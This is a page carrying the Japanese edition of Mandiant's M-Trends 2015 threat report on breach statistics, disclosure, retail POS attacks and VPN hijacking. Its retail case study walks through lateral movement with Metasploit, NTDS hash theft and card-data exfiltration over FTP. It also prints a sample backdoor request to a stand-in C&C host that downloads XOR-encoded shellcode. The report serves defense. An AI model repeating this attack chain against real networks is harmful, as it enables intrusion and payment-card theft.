Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

M-Trends 2015 セキュリティ最前線からの視点

448 views

Published on

の業種で発生したセキュリティ・インシデント数百件の分析結果、統計情報、事例研究を元に、APT攻撃(Advanced Persistent Threat: 高度で持続的な標的型攻撃)で使用されるツールや手口が過去1年間でどのように進化したかを示しています

Published in: Technology
  • Be the first to comment

  • Be the first to like this

M-Trends 2015 セキュリティ最前線からの視点

  1. 1. SECURITY CONSULTING 脅 威 レ ポ ー ト セキュリティ最前線からの視点 M-Trends® 2015:
  2. 2. M-Trends セキュリティ最前線からの視点 目次 はじめに……………………………………………………………………………………… 1 被害の統計…………………………………………………………………………………… 2 傾向1:被害の公表をめぐる問題…………………………………………………………… 4 サイバー攻撃に詳しくなった社会……………………………………………………… 4 高まる要求水準………………………………………………………………………… 5 被害を公表する組織が増加している理由 …………………………………………… 5 傾向2:狙われる小売企業 ………………………………………………………………… 7 侵入口として狙われるアプリケーションの仮想化サーバー……………………………… 7 新たなツールや手口、手順の登場 …………………………………………………… 7 「Chip-and-PIN」カードの普及地域で増加するeコマース事業者への攻撃 ……… 7 推奨事項 ………………………………………………………………………………12 傾向3:進化する攻撃ライフサイクル ……………………………………………………… 13 VPNの乗っ取り ………………………………………………………………………13 マルウェアの隠 と偽装 ………………………………………………………………14 入手が容易になったパスワード ………………………………………………………18 WMIとPowerShellを使用してネットワーク内を移動 ………………………………19 傾向4:あいまいになる境界線 - 互いの手口を模倣する サイバー犯罪者とAPT攻撃者 ………………………………………………………………20 攻撃の意図を見極める重要性 ……………………………………………………… 20 両グループの区別の重要性 ………………………………………………………… 22 結論 …………………………………………………………………………………………23 Mandiantについて …………………………………………………………………………24 FireEyeについて ……………………………………………………………………………24
  3. 3. www.mandiant.com 1 はじめに Mandiantでは数年来、セキュリティに「完璧」はないと主張し続けています。 2014年に起きた一連のセキュリティ・インシデントは、この主張の正しさを 裏付けるものとなっています。 セ キュリティ対策のギャップを埋める組 織側の取り組みには、ある程度の改善 が確かに見られます。しかしサイバー 攻撃者の手口は、高度な攻撃のみならず一般的 な攻撃においても、残念ながら防御側の進歩を 上回るペースで継続的に進化を遂げています。 昨年のM-Trendsレポートでは、サイバー・セキュ リティはIT関連の限定的な課題にとどまらず、取締 役会の優先課題に取り上げられるまでに深刻化 していると述べました。そして今年に入り、サイバー・ セキュリティ(より正確には、「サイバー・セキュ リティ対策が不十分という事実」)は社会問題 と呼ぶべきフェーズに突入しています。2015年の 最初の数週間だけで、米大統領が一般教書演説で 言及し1 、莫大な制作費をかけた映画のシナリオに 採用され2 、挙げ句の果てにはゴールデン・グローブ 賞のテレビ中継冒頭の話題に取り上げられる3 まで に至りました。 セキュリティの最前線でインシデント・レスポン スにあたるMandiantのコンサルタントは、攻撃 者の動機や手口の変化をいち早く把握できる立場 にあります。本書で紹介する知見や分析結果は、 数百件に及ぶ過去のインシデント・レスポンス事例 で培った経験と実績に基づいています。Mandiant はこの10年間、30業種以上の世界中のさまざま な組織で発生したセキュリティ・インシデントに 対応してきました。 組織のセキュリティ対策は確かに進歩しています。 しかし攻撃者は依然として、侵入が発覚するはるか 前から企業、組織のネットワークの中を自由に動 き回っています。侵害が発覚するまでの日数は、 平均で2013年の229日に対し2014年は205日と 短縮傾向を示すものの、依然として攻撃者に十分 すぎるほどの活動期間を与えているのが現状です。 また、自分たちで侵入を検知した組織の割合もそ れほど変わっていません。今回の調査で、捜査当局 など外部からセキュリティ侵害の指摘を受けた組 織の割合は69%。2013年の67%、2012年の63% から若干の増加傾向を示しています。 最も多く攻撃を受けた業種は、前回に引き続き小売 業です。この傾向は、販売時点情報管理(POS) システムからクレジット・カード情報を盗み出す 新たな手口の登場が関係していると考えられます。 特に「Chip-and-PIN」方式のカード(チップが内臓 されたカードで支払い時に4桁の暗証暗号を入力 することでセキュリティ強化を狙う)が普及してい る地域では、eコマース事業者や決済処理事業者 に対する攻撃が増加しています。 また2014年には、これまで被害報告の少なかった 一部の業種に対するセキュリティ侵害が目に見えて 増加していました。特に顕著だったのは、プロフェッ ショナルサービス業、医療、官公庁、そして国際 組織です。 攻撃者は、新たなセキュリティ対策の登場に合わせて、 攻撃手法を進化させています。このような傾向は、 2014年もはっきりと見て取ることができました。 バーチャル・プライベート・ネットワーク(VPN)のセッ ションを乗っ取る、検知をすり抜ける、認証情報を 盗み出す、ネットワークに潜伏する、侵入先に長期的 な足がかりを築くなど、一連の攻撃活動のために、 攻撃者は新たな手口を開発したり実績ある既存の 手法を進化させています。 また、セキュリティ・インシデントの発生を公表する 被害組織が増える一方で、被害の発覚直後に誰も が抱く疑問、すなわち「いったい誰が?」という問い に答えることがいっそう難しくなっています。高度な 手法を駆使するようになったごくありきたりなサイバー 犯罪者と、偽装工作のために既製ツールを使用す るようになった国家レベルの高度な攻撃者の判別 が困難になっているのがその一因です。 このように、セキュリティ脅威の動向は.以前にも増 して複雑化しており、セキュリティ担当者にとって、 サイバー攻撃の防御、検知、解析、そして対応は、 従来以上に厄介で重要な任務となっています。 1 Michael D. Shear (The New York Times). Obama to Announce Cybersecurity Plans in State of the Union Preview. January 2015. 2 Sheri Linden (The Hollywood Reporter). Blackhat : Film Review. January 2015. 3 Christopher Palmeri (Bloomberg). Hollywood Spoiled Brats Are Easy Targets at Golden Globes. January 2015.
  4. 4. M-Trends セキュリティ最前線からの視点 2 www.mandiant.com 以前の調査では被害報告の少なかった一部 の業種で、セキュリティ侵害が目に見えて 増加しています。 業務サービス/専門サービス 官公庁/国際組織 医療 6% 医療 5% 運輸 3% 航空宇宙/防衛 7% 法律サービス 8% その他 7% ハイテク/IT 8% 建設/土木 17% 業務サービス/専門サービス 7% 官公庁/国際組織 14% 小売 10% 金融サービス 3% 8% メディア/エンターテインメント 5% 2014年は、複数の主要な業種で被害報告数に大きな変化が 見られます。 小売 - 4%から14%に増加 メディア/エンターテインメント - 13%から8%に減少 Mandiantがインシデント・レスポンスを実施した業種 被害の統計 攻撃者は幅広い業種を標的にしており、2014年以降一部の業種の被害報告が増加しています。また、 侵害が発覚するまでの日数は2013年より多少短くなっていますが、それでもネットワークに侵入した 攻撃者に十分すぎるほどの活動期間を与えている事実に変わりはありません。一方、外部から指摘 を受ける前に自ら侵入を検知した組織の割合は低下しています。
  5. 5. www.mandiant.com 3 APTフィッシング フィッシング・メールの78%はITや セキュリティに関係する内容。その 多くは、標的とする組織のIT部門や アンチウイルス・ベンダーからの連絡 を装っている 78% フィッシング・メール の72%は平日に 送信されている 72% 日 土 金 木 水 火 月 セキュリティ脅威の種類 妨害・迷惑行為 データ窃盗 サイバー犯罪 ハクティビズム 破壊活動 目的 アクセス、拡散拡大 経済的、 政治的な利益 金銭的な利益 中傷、圧力、 政治的な主張 業務の妨害 例 ボットネット、 スパム APT攻撃グループ クレジット・ カード情報の窃盗 Webサイトの改ざん データの消去 標的型 特徴 プロセスの自動化 持続的 不特定多数の ターゲット 自己顕示欲 対立を契機 ネットワークへの侵入を試みるサイバー攻撃者の動機は、金銭的利益から政治的主張に至るまで広範囲にわたっています。 セキュリティ侵害の最初の痕跡から 検知までの日数 205 検知までの間に、攻撃者が侵入先 のネットワークで活動していた平均 日数 2013年から24日間短縮 最長は2,982日に及ぶ セキュリティ侵害が発覚した経緯 31% 自ら侵害を検知 した組織の割合 69% 侵害の事実を外部 から指摘された組 織の割合
  6. 6. M-Trends セキュリティ最前線からの視点 4 www.mandiant.com 傾向1: 被害の公表をめぐる問題 サイバー攻撃による被害が従来以上にメディアの注目を集めるようになったため、被害の公表 自体が企業、組織にとってさらに大きなプレッシャーになっています。 M andiantが2014年にインシデント・レス ポンスを実施した組織のうち、データ 侵害の事実を公表したのは30社を上回 ります。その多くは、怒濤の報道に翻弄されながら も情報開示に踏み切りました。Mandiantの経験 では、事実として判明しているセキュリティ侵害 の範囲と程度を公表することで、被害を受けた 組織が明確で適切なメッセージを社会に発信で きるという大きな意義があります。また、公表済み の内容を何度も訂正し、その都度信頼を失うと いう悪循環を避けられるメリットもあります。 サイバー攻撃に詳しくなった社会 2014年、セキュリティ侵害の発生が被害組織から 次々公表された結果、標的型攻撃の脅威とその 影響が広く社会に認知されるようになりました。 一方で情報を公表する側に、より詳しい情報の 開示を求め、鋭い質問が投げかける場面も増えて きました。インシデントの発生時期や漏えいした データの種類を公表するだけでは、メディアや 取引先、投資家、一般消費者は満足しません。使用 されたマルウェアの種類や侵入の手口といった 細かな情報まで明らかにしなければ、そうした人 たちの納得は得られないのです。 さらに、攻撃者の素性を明らかにすることを求める プレッシャーも日増しに強くなっています。攻撃 者は誰なのかという質問は、Mandiantが調査を 開始する最初の日、つまりセキュリティ侵害の証拠 集めに着手したばかりの時点で.お客様からしばしば 尋ねられる問いでもあります。昨今では、タイプ の異なる攻撃者が同じようなツールを使用する ケースが増えており、攻撃者の特定は以前よりも さらに難しくなっているのが実情です(P.20「曖昧 になる境界線 - 互いの手口を模倣するサイバー 犯罪者とAPT攻撃者」を参照)。 公表の実施計画を策定する際には、侵害の範囲と程度の把握が欠かせません。その両方の取り 組みによってはじめて、過去の発表を何度も訂正し、その都度信頼を失うという悪循環を避けるこ とができるのです。
  7. 7. www.mandiant.com 5 高まる要求水準 情報開示に対する要求が高まる中、多くの組織は、 大規模セキュリティ侵害の発生直後に行うコミュニ ケーションの信頼性と一貫性がいかに重要であ るかを認識し始めています。しかし、未確定の事実 が少なからずある中で、情報をどこまで開示する かを判断することは容易ではありません。 大規模なセキュリティ侵害が発生すると、さまざま な憶測が流れるため、被害組織はしばしばその 否定に追われます。たとえばMandiantが実際に 目撃したケースでも、インシデントの調査と被害 対応が続く中、攻撃者の侵入方法についての憶測 が取りざたされ、 話への反論に振り回される といった事例が複数ありました。 根拠のない情報への対応に追われていると、事実 確認と追跡調査というインシデント・レスポンスの 本来の目的がおろそかになる恐れがあります。 被害を公表する組織が増加している理由 ではなぜ、被害事実を公表する組織が増えてい るのでしょうか。断言はできませんが、次の2つ の要因が関係していると思われます。まず、ここ 数年増加しているクレジット・カード情報や個人 情報の漏洩では、法規制により特定の情報の開示 が義務づけられている場合が多い点です。 また2014年、Mandiantが実施したインシデント・ レスポンスの69%がそうだったように、セキュリ ティ侵害が、取引先や顧客、捜査当局など外部 からの指摘で発覚するケースが増えている点も 要因の1つと考えられます。 つまり、「攻撃者のほかにも、インシデント発生 の事実を知っている組織がある」という意識から、 被害を公表している場合が考えられるのです。 被害を公表するかどうかに関係なく、重要なのは 直接の利害関係者がすぐに情報を求めていると しても、調査には数週間から数か月を要する場合 があり、事実関係の把握にはそれなりに時間を 要すという点です。公表の実施計画を策定する際、 侵害の範囲と程度の把握が欠かせないのはその ためです。 要点:セキュリティ侵害の事実を公表し、メディアで大々的に報道される組織が増え ています。メディアや一般消費者、企業各社の間にも、セキュリティ侵害の発生を完全に 防ぐことはできないとの認識が広まりつつありますが、同時に被害を受けた組織が侵害 の内容について詳細な質問をぶつけられ、より多くの情報を開示するよう求められる ケースが増加しています。このような状況に的確に対処するには、公表の適切な実施 計画が必要です。そして適切な計画の策定には、綿密なインシデント調査に基づく事実 関係の正確な把握が欠かせません。
  8. 8. M-Trends セキュリティ最前線からの視点 6 www.mandiant.com セキュリティ侵害の公表時に 問われる5つの質問 以下に挙げた例は、セキュリティ侵害の公表時に、被害を受けた組織がメディア や投資家、顧客、取引先から問われる場合が多い質問です。被害を受けた組織の 担当者は、これらの問いに対する適切な回答を用意し、不正確なメッセージや 一貫性に欠けたメッセージを公に発信しないよう注意する必要があります。 攻撃者はどのようにネットワークに侵入し たのか? 最も典型的な侵入の手口は、ソーシャル・エンジニア リングと未知の脆弱性の悪用を組み合わせたケース です。また、インターネットに接続されたサーバーを 攻撃する、Eメールに不正なファイルを添付して開か せる、さらには標的組織のユーザーがよくアクセスする Webサイトにマルウェアを仕掛けるといった手口も よく使われます。このような侵入の手口を把握してお くことは重要ですが、攻撃者のアクセスを完全に遮断 したかどうか、脅威を完全に封じ込めたかどうかを 説明できるよう事前に準備する取り組みがカギを握り ます。 攻撃者はどのようにネットワークに繰り返し アクセスしていたのか? 多くの攻撃者は、データを盗み出すなどの目的を達成 するために繰り返しネットワークにアクセスします。 攻撃者が二度とアクセスできないようにするには 、 攻撃者が設置したすべての侵入口をふさぐ必要があ ります。多くの攻撃者は、バックドアやWebシェルを 仕掛ける、既存のVPNを乗っ取るなどして、リモート・ アクセス・システムを侵入口として利用します。 攻撃はどのような手順で行われたのか? 攻撃者がネットワークに侵入してデータを盗み出し た経緯を理解することで、将来起こり得る同じような 攻撃の防御に役立ちます。またセキュリティ侵害の 範囲を正確に特定できなければ、被害の復旧はいう までもなく、インシデントの影響を把握することも困難 です。 盗み出されたデータの内容は? 盗み出されたデータを特定する際には、多くの場合、 侵入を受けたシステムのフォレンジック解析が必要と なります。ただし、解析を実施しても、完全に特定で きるとは限りません。 盗まれたデータ、またはその可能性があるデータの 種類によっては、法的な責任が生じる場合もあるため、 法務部門と協力して対応にあたる必要があります。 脅威はすべて封じ込めることができた のか? 他の4つの質問に答えることができれば、おそらくこの 問いに対しても対応が可能でしょう。また最近のセキュ リティ脅威のライフサイクルを理解していると、より 効果的にインシデント・レスポンスを実施し、復旧作業を 行うことができます。
  9. 9. www.mandiant.com 7 傾向2: 狙われる小売企業 2014年に発生した1,000社以上の企業に対するセキュリティ侵害の中で、最も多く狙われたの は小売企業です。その結果、数え切れないほど多くの一般消費者がクレジット・カードの再発 行を余儀なくされました4 。Mandiantの調査では、小売企業に対する攻撃の増加という事実に 加え、特にこれらの企業を狙う新しい攻撃グループやツール、手口の存在も明らかになってい ます。 侵入口として狙われるアプリケーションの 仮想化サーバー アプリケーションの仮想化技術を使用すると、 隔離されたデスクトップ環境を構築し、特定のプロ グラムに限定してリモート・アクセスを許可すること ができます。適切に構成されたアプリケーション 仮想化環境では、ユーザーが作業できる範囲を 仮想環境の保護領域内に制限できますが、些細 な構成ミスによって保護領域に 間が生じてし まうケースが後を絶ちません。このような場合、 攻撃者に仮想環境を突破され、システムの別の 領域に侵入される恐れがあります。 Mandiantが調査を実施したセキュリティ・イン シデントのうち、アプリケーション仮想化環境を 狙った攻撃のすべてに、ある共通の問題が見ら れました。環境の構築時に、ユーザー名とパス ワードの入力だけでアプリケーションにリモート・ アクセスできるようにしていたのです。もしすべて の環境で2ファクタ認証を導入していれば、被害 の発生を回避できたケースもあったはずです。 新たなツールや手口、手順の登場 新たな攻撃グループの出現は、新たなツールや 手口、手順の登場を意味します。各グループの スキル・レベルはまさに千差万別です。既製の ツールで攻撃を仕掛ける低いスキルの攻撃グループ もあれば、特定のPOSアプリケーション向けに 開発されたマルウェアで巧みにクレジット・カード 情報を窃取する高度な攻撃グループも存在し ます。 興味深いのは、低いスキル、もしくはスキルを持 たない攻撃グループでも、熟練のグループと同様 にクレジット・カード情報の窃取に成功している点 です。スキルレベルに関係なく、多くのグループが 既存のセキュリティ対策をすり抜けてネットワーク に侵入し、POSシステムにアクセスして、カード 情報を収集するマルウェアを仕掛けています。 「Chip-and-PIN」カードの普及地域 で増加するeコマース事業者への攻撃 EMV(Europay, MasterCard, and Visa)テク ノロジーを採用した「Chip-and-PIN」方式の カードが、いよいよ米国にも導入されつつあり ます。約20年の歴史を持つ同技術は、米国以外 の地域ではグローバル・スタンダードとして広く 普及していますが、米国の小売企業への導入は 従来から進んでいませんでした。 EMV搭載のクレジット・カードは、トランザク ションごとに一意のコードを生成するため、偽造が 非常に困難になります。そのため攻撃者は、より 攻撃の容易なターゲットへと狙いを変えた可能 性があります。同カードの普及地域では、従来と 比べてeコマース事業者や決済処理事業者への 攻撃が増加しているのです。 4 U.S. Department of Homeland Security and U.S. Secret Service. Backoff Malware: Infection Assessment. August 2014.
  10. 10. M-Trends セキュリティ最前線からの視点 8 www.mandiant.com 事例 米国の大手小売企業から、3か月間に数百万件の クレジット・カード情報を盗み出した攻撃者 この事例は、2014年に多発した小売企業 に対する攻撃の典型といえます。正規 の認証情報を使用して標的のシステム にリモート・アクセスしネットワーク内を 移動、店舗のレジにPOSマルウェアを 仕掛けるというおなじみのパターンをその まま踏襲していました。被害者の小売 企業は、米国当局から指摘を受けて、はじ めてセキュリティ侵害を受けている事実 に気付きました。 ネットワークへの侵入 攻撃者はまず、正規の認証情報を使用 して小売企業の仮想アプリケーション・ サーバーに接続。限定的な権限が設定 された仮想デスクトップへのアクセス権を 取得します。ログオンに失敗した痕跡が ないため、攻撃者は事前にアカウントの 認証情報を入手していたと思われます。 認証情報の入手方法に関して、残された 証拠からは特定されていません。 攻撃者は続いて、仮想デスクトップのわず かな構成ミスを突いてシステム権限を 昇格させ、コマンドラインへのアクセス権、 つまりシステムを直接制御する権限を 取得します。さらにWindowsのFTP コマンドでパスワードのダンプ・ツールを ダウンロードし、同ツールを使ってロー カル管理者アカウントのパスワードを入手。 この小売企業の全システムでは、まったく 同じ管理者パスワードが使い回されて いました。 ここまで、わずか数分の出来事です。 ネットワーク内の移動 管理者パスワードを入手した攻撃者は、 Metasploitフレームワークを使用して ネットワーク内を移動します。Metasploitは、 エクスプロイト・コードを作成、テスト、 実行するためのオープンソースの攻撃 フレームワークで、システムに存在する 脆弱性の発見と悪用に役立つさまざまな モジュールを備えている点が特徴です。 その多機能さから、セキュリティ研究者 とサイバー攻撃者のどちらにも広く利用 されています。 この攻撃で使用されていたモジュールは、 当該システムでのコマンド実行を可能に するpsexec_commandです。この モジュールでは、コマンドがWindows のサービスとして実行されるため、 Windowsのシステム・イベント・ログに 攻撃の痕跡が多数残ります。 攻撃者は、各システムにアクセスし続け ながら、本社ネットワークのドメイン・ コントローラに狙いを定めます。ドメイン・ コントローラは、Windows環境の認証 処理を管理するサーバーです。この企業の ドメイン・コントローラでは、前述した ローカル管理者アカウントと同じ認証情報が 使用されていたため、攻撃者は難なく同 システムへのアクセスを果たしました。 ドメイン・コントローラに侵入した攻撃者は、 Metasploitのntdsgrabモジュールを使用 して、NTDSデータベースのコピーとシス テム・レジストリのハイブを入手します。 NTDSデータベースには、ユーザー名と パスワードのハッシュなど、ドメイン・コント ローラが使用するActive Directoryの 情報が格納されています。ntdsgrab モジュールは、Windowsのボリューム・ シャドウ・コピー・サービス(VSS)を使用 して、NTDSデータベースを格納する パーティションのシャドウ・コピーを作成 します。VSSは、バックアップやリストア 目的でシステムのスナップショットを作成 する正規のサービスですが、攻撃者は NTDSデータベースのコピーを作成する 目的でこのサービスを使用。作成したコピー から、他のツールでパスワードのハッシュ を抽出していました。 ドメイン管理者のパスワード・ハッシュを 解読した攻撃者は、そのパスワードを使用 してネットワーク中のシステムに侵入し ます。 攻撃者はここで、Metasploitの使用を 止め、非対話型のネットワーク・ログオンや SysInternalsのPsExecツール、リモート・ デスクトップ・プロトコル(RDP)による ログオンなど、より一般的な手法を使っ てネットワーク内を移動し、ドメイン管理者 のアカウントで仮想アプリケーション・ サーバーにログインします。このような 手順によって、攻撃者はRDP経由で各 システムにログインし、さまざまな操作 を行うことが可能となりました。 バックドア 侵入先のネットワークに足がかりを残 すため、攻撃者は複数のマシンにバック ドアを仕掛けます。使用されたバック ドアの実体は、Windows XPシステムに 対応した不正なデバイス・ドライバです。 このバックドアは高機能なアーカイブ・ ソフトで圧縮されていますが、これとよく 似たアーカイブ・ソフトは広く流通して いる高度なマルウェアでも使用されて います。バックドアの実体であるデバイス・ ドライバは、まず自身をメモリ内に展開 した後、新しいシステム・スレッドを起動 します。
  11. 11. www.mandiant.com 9 POST /evil.txt HTTP/1.0 Accept: */* Content-Length: 32 Content-Type: application/octet-stream User-Agent: Evil_UA_String Host: 1.2.3.4 Pragma: no-cache <POST_DATA> <!-XOR_Encoded_Shellcode --> バックドアがHTTP POSTリクエストを C&Cサーバーに送信 XORエンコードのシェルコードを ダウンロード、実行 感染システム 攻撃者の C&Cサーバー psexec_commandの動作: psexec_commandモジュールは、実行する コマンドと出力ファイル(テキスト・ファイル) をWindowsのバッチ・ファイルに書き込み ます。テキスト・ファイルとバッチ・ファイル のどちらにも、ランダムに生成された16文字 のファイル名が付けられます。 続いて、作成したバッチ・ファイルを実行し ます。 Windowsのシステム・イベント・ログに書き 込まれたサービス情報を図1に示します。 A service was installed in the system. Service Name: MRSWxwQmQxFGumEFsW Service File Name: %COMSPEC% /C echo dir ^> %SYSTEMDRIVE% WINDOWSTempTthwsVKvUhydrsNB.txt > WINDOWSTemp RbhRmgALAHcdyWXG.bat & %COMSPEC% /C start %COMSPEC% /C WINDOWSTempRbhRmgALAHcdyWXG.bat Service Type: user mode service Service Start Type: demand start 図1:Metasploitのpsexec_commandモジュールがインストールしたサービス ここで元のドライバが読み込みに失敗した ことをシステムに通知しますが、展開された コードは元のドライバとは別のプロセスで 実行されるため、Windowsがドライバの読 み込みを認識しなくてもマルウェアは実行 されます。この手法はリバース・エンジニア リングを妨害し、バックドアの機能を隠 する目的で使用されています。 バックドアは、展開されたドライバがユーザー 空間プロセス(Windowsカーネルの外で 実行されるプロセス)に挿入したシェル コードを利用して機能を追加します。この シェルコードは、ハードコードされたIPアドレス 宛にHTTPPOSTリクエストを送信し、HTML コメントとして記述されXORでエンコード されたシェルコードをダウンロードします。 このようにバックドアは、新しいシェルコード をダウンロードして実行するだけで新機能を 追加できるため、容易に多機能化すること が可能です。シェルコードをこのように利用 する手法はけっして目新しくありませんが、 同手法とアーカイブ・ソフトとの組み合わせ は他では見られないこのバックドア独自の 特徴です。 バックドアとC&Cサーバーの通信内容を図2 に示します。 図2:バックドアによる通信
  12. 12. M-Trends セキュリティ最前線からの視点 10 www.mandiant.com 小売チェーンで使用 されているすべての レジは、小売ドメイン のコントローラで認 証されます。つまり、 小売ドメインのコント ローラにアクセスで きるユーザーは直接、 店舗のレジにアクセス できることになります。 データの窃取 ドメイン管理者のパスワードをプレーンテキ ストで入手した攻撃者は、本社ネットワーク の各Windowsシステムへの"フリーパス"を 獲得したことになります。 この段階で、攻撃者は小売ネットワークへの アクセス権を取得するための活動を開始し ます。 小売ネットワークは次のように構成されてい ます。 • 小売ドメインは本社ドメインと双方向の 信頼関係を確立している。 • 店舗のレジはWindows XPで動作して いる。 • 店舗のレジは小売ドメインに参加して いる。 小売業界に典型的なこの構成には、攻撃者 にとって好都合な点がいくつか存在します。 まず、攻撃者が入手済みのドメイン管理者の 認証情報を使用して、小売ドメインの各シス テムに特権アカウントでアクセスできる点 です。 次に、小売ドメインが本社ドメインの子であ る点です。本社ドメインと小売ドメイン間で 特定の機能を使用するためには、両方のドメ イン・コントローラ間で重要なポートをオー プンにしておく必要があります。オープンさ れたポートでの通信には、この小売企業が導入 しているその他のファイアウォールのルール は適用されません。そのため攻撃者は、これ らのポートを使用してドメイン・コントローラ にアクセスし、そこから小売ネットワークに 侵入しています。 小売チェーンで使用されているすべてのレジは、 小売ドメインのコントローラで認証されます。 つまり、小売ドメインのコントローラにアク セスできるユーザーは直接、店舗のレジに アクセスできることになります。攻撃者は、 小売ドメインのコントローラでWindowsの バッチ・スクリプトを実行し、POSシステム上 のカード情報を収集するマルウェアを全店舗 のレジにコピーしていました。 その後、スケジュール設定したWindows タスクでマルウェアを実行し、カードの磁気 ストライプに記録されたクレジット・カード 番号や有効期限などのトラック・データを POSアプリケーションのプロセス・メモリから 収集します(攻撃者は、収集したトラック・ データをカードの偽造業者に転売します)。 このPOSマルウェアは、OSQLを使用して Microsoft SQL Serverの一時データベース であるtempdbテーブルにトラック・データ を書き込みます。OSQLは、レジ・システムに プリインストールされたコマンドラインの SQL照会ツールです。tempdbテーブルに 格納されたデータはSQL Serverサービス の停止時に消去されるため、攻撃者は1日に 1回、全レジのtempdbテーブルを照会し、その 出力をドメイン・コントローラ上のテキスト・ ファイルに送信します。 攻撃者はその後、トラック・データが記録さ れたテキスト・ファイルをアーカイブし、イン ターネットにアクセスできる小売ネットワーク のワークステーションに転送。さらにこの ファイルを自身が管理するサーバーにFTP 経由で転送します。 この攻撃の実行プロセスを図3に示します。
  13. 13. www.mandiant.com 11 仮想アプリケーションから抜け出して本社ネット ワーク内を移動し、各システムから認証情報を収集 します。 2 小売ネットワークのドメイン・コントローラを足が かりに店舗のPOSレジにアクセスし、クレジット・ カードのトラック・データを収集するマルウェア をPOSレジに仕掛けます。 3 攻撃者が、仮想アプリケーション・サーバー経由で標的のネット ワークにリモート・アクセスします。認証には正規の認証情報 を使用します。 1 収集したトラック・データを POSレジから回収し、小売ドメ インのコントローラから小売ネット ワーク上のユーザー・ワークス テーションに転送します。さら にこのトラック・データを、FTP 経由で外部のFTPサーバーに 転送します。 4 仮想アプリ ケーション・ サーバー 本社ドメインの コントローラ 小売ドメインの コントローラ ユーザー・ ワークステーション 最初のアクセス FTP経由でデータを外部に送信 ユーザー・ ワークステーション レジ1 レジ2 店舗2 小売ドメイン本社ドメイン DMZ レジ1 レジ2 店舗1 C&Cトラフィック 攻撃者 図3:攻撃の概要
  14. 14. M-Trends セキュリティ最前線からの視点 12 www.mandiant.com 推奨事項 急増するサイバー攻撃に、小売企業はどのように対応すればよいのでしょうか。もちろん、すべ ての攻撃、すべてのセキュリティ侵害を完全に防ぐことは困難です。しかし、次に示すガイドラ インに従えば、ネットワークへ侵入しネットワーク内部を移動する攻撃者をある程度妨げることが できます。セキュリティ部門が適切なツールを使用し、警戒を怠らなければ、攻撃の進行を遅らせ て時間を稼ぎ、最悪の事態が発生する前に攻撃を検知、分析した上で、適切な対応が可能になり ます。 リモート・アクセスの保護 社員や下請け業者、取引先による企業ネット ワークへのリモート・アクセスの実態を確認し、 その手段、許可するユーザー、パスワード要件 など、リモート・アクセスを構成するすべての 要素を管理します。すべてのリモート・アクセス 手段には2ファクタ認証を義務づけ、リモート からのログオンを常時監視して不審な行動の 有無をチェックします。 PCI環境へのアクセスを保護する PCI(Payment Card Industry)環境をネット ワークの他のセグメントから隔離します。PCI 環境のシステムへのアクセスは、高セキュリ ティ・ゾーンのデバイスを管理するセキュアな ジャンプ・サーバーを経由するように設定し、 このサーバーへのアクセスには2ファクタ認証 を必須とします。可能な場合には、小売側の ドメインを分離して、他のドメインとの接続を 最小限に抑えます。また、アウトバウンドのネット ワーク・トラフィックの接続先を業務に不可欠 な承認済みのリソースに限定する対策も重要 です。 重要なシステムにアプリケーション・ ホワイトリストを導入する 重要なシステムにアプリケーション・ホワイト リストを導入し、不正なファイルが実行される 可能性を抑えます。この対策は、クレジット・ カード情報を保存するシステムやジャンプ・ サーバー、ドメイン・コントローラなど、すべての 重要なシステムを対象とする必要があります。 特権アカウントを適切に管理する 攻撃者は、ローカル管理者やドメイン管理者、 サービス・アカウントなど、特別な権限を持つ アカウントの乗っ取りを試みます。セキュリティ 部門は、特権アカウントの数を限定して、すべ てのローカル管理者アカウントのパスワードが 必ずユニークとなるように管理する必要があり ます。そのためには、個々の認証情報の管理や 使用するたびにパスワードを自動変更できる パスワード管理ツールの導入を検討します。この ようなツールを導入すると、特権アカウント をより厳密に管理できます。 要点:金銭の集まるところには、必ず犯罪者の姿があります。金銭的利益を目的とする 犯罪者にとって、小売企業は古くから格好の標的であり、その傾向は2014年以降も変わりあ りません。攻撃者は新たな手口を生み出し、メディアに取り上げられる機会も増えていま すが、基本的な戦略はここ数年ほぼ一貫しています。
  15. 15. www.mandiant.com 13 傾向3: 進化する攻撃ライフサイクル Mandiantが調査を実施したほとんどのインシデントは、典型的なパターンをたどっています。 Mandiantではこのパターンを攻撃ライフサイクルと呼んでいます。 情 報資産を巡る攻防はまさにいたちごっこ です。防御側が新たな対策を講じれば、 攻撃側もそれに合わせて手口を変え てきます。これは、2014年も繰り返されてきました。 2014年、特に増加していたのは、侵入先ネット ワークへのアクセスを維持するためにVPNを乗っ 取るという手法です。このほか、検知を回避する 巧妙な手法や、認証情報を盗み出し、ネットワーク 内を移動する新たなツールと手口も確認されて います。 VPNの乗っ取り 標的のVPNを乗っ取る攻撃者には、2つの大きな 利点があります。まず、バックドアを仕掛けるこ となく、いつでもネットワークにアクセスできるよ うになる点です。さらに、正規ユーザーになりす ませば、侵入が発覚する危険性が低下します。 ここ数年、標的のネットワークに足がかりを築いた 直後から、VPN関連のリソースや認証情報を探し 始める脅威グループが確認されています。この種の 活動は2014年に入ってさらに活発化しており、 VPNの乗っ取りに成功する攻撃はかつてないほど 増加しています。 Mandiantがインシデント・レスポンスを実施 したVPNに対する攻撃事例のほとんどで、次の いずれかの攻撃手法が使用されています。 • 1ファクタ認証:VPNの認証で要求される情報 がユーザー名とパスワードのみである場合、 攻撃者は侵入先のエンドユーザー・システム やActive Directoryドメインから盗み出した 認証情報をそのまま使用します。 • 証明書を利用した2ファクタ認証:VPNの認証で、 第2ファクタとしてユーザーごとのデジタル証明書 を要求される場合、攻撃者はMimikatzなど 一般に入手可能なツールを使用して、侵入先の エンドユーザー・システムから証明書を抽出 します。また、平文のメールに添付する、公開 ネットワーク・ファイル共有に保存するなど、 リスクが高い手段でユーザーに配布された VPN証明書を盗み出しているケースもありま した。 他に、VPNの認証を完全に回避するエクスプロ イトを使用した攻撃も、少数ながら確認されて います。このような攻撃で使用されていた脆弱性 の1つが「Heartbleed」です。2014年4月に発覚 して大変な騒ぎとなったHeartbleedは、T L S (Transport Layer Security)のHeartbeat 拡張に存在する脆弱性です。この脆弱性を悪用 された場合、攻撃を受けたサーバーや各種デバ イスは、メモリ上のデータ(最大64キロバイト)を リクエストに応じて返してしまう恐れがあります。 Heartbleedが発覚した当初、この脆弱性の影響 範囲や、暗号 、ユーザーの認証情報といった 機密データが実際に盗み出される可能性について、 セキュリティ研究者らは議論を重ねていました。 当時想定されていた最悪のシナリオは、すでに 現実化しています。Heartbleedの情報開示から 数週間内に発生したインシデントにおいて、攻撃者 が同脆弱性を悪用して正規ユーザーの認証済み 